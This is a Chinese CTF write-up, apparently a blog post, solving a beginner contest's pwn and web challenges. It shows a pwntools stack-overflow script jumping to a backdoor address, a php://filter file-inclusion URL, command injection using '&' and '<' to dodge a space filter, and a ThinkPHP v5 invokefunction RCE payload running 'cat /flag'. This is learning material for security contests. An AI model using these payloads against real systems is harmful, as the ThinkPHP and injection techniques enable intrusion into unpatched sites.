CDUT新生赛wp pwn web

一起讲了得了

贝壳是什么东西

kali中终端运行
nc ctf.dino209.cn 8001
然后直接拿到flag

EZのStack_Overflow

栈溢出的题
ida打开
在这里插入图片描述

双击第四行函数
在这里插入图片描述
可以看到我们的buf变量开了132的空间 但是可以read256个字符
所以会造成栈溢出
我也不太懂 我不是pwn手
ebp是栈帧地址
现在离他的距离是88(16进制 十进制是136
我们可以双击buf查看
在这里插入图片描述

为了覆盖r 所以我们构建140个"a"的payload

可以轻松找到后门函数
在这里插入图片描述
tab 再空格
在这里插入图片描述

找到后门函数的地址

所以我们可以利用栈溢出原理覆盖原来应该执行的下一条命令 来执行这个后门函数的命令 从而获取权限

上脚本

from pwn import *
io=remote('ctf.dino209.cn',8002)
#123
payload = b'a'*(140)+p32(0x08049216)
io.send(payload)
io.interactive()

然后ls命令

cat flag命令即可

Dino{This_is_a_EZ_stack}

web
我不是web手 我也没学过web 理论上我能做的web纯萌新们都可以做
flappy bird

我不知道玩完给不给 反正我没玩
进网址 右键查看源码
在这里插入图片描述

双击main.js文件
在这里插入图片描述

发现answer字样 复制 去base64解密

在这里插入图片描述

dino{welcome_to_cyberspace}

babyinclude

不会 不懂 他说文件包含我就百度一下
搜索知道关键词 php伪协议
所以直接复制人家的payload改一下就可
http://ctf.dino209.cn:7005/index.php?Dino=php://filter/read=convert.base64-encode/resource=flag.php
然后base64再解码
在这里插入图片描述

<?php $flag='{d0_u_love_ctf_welc0me}'; ?>

easy_eval

百度 抄 学习

试了试发现
输入1.1.1.1&ls 是可以执行的 目录下有flag
但是1.1.1.1&cat flag 不能执行 读代码发现是他禁止输入空格
百度知道可以用<代替空格
所以
输入

在这里插入图片描述

dino{you_really_know_eval}

能弹窗就算成功

按f12
在这里插入图片描述

easy_thinkphp

直接搜 thinkphpv5 漏洞 利用 工具
在这里插入图片描述
直接执行命令就行 这个flag是动态的 就不放了
payload打

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值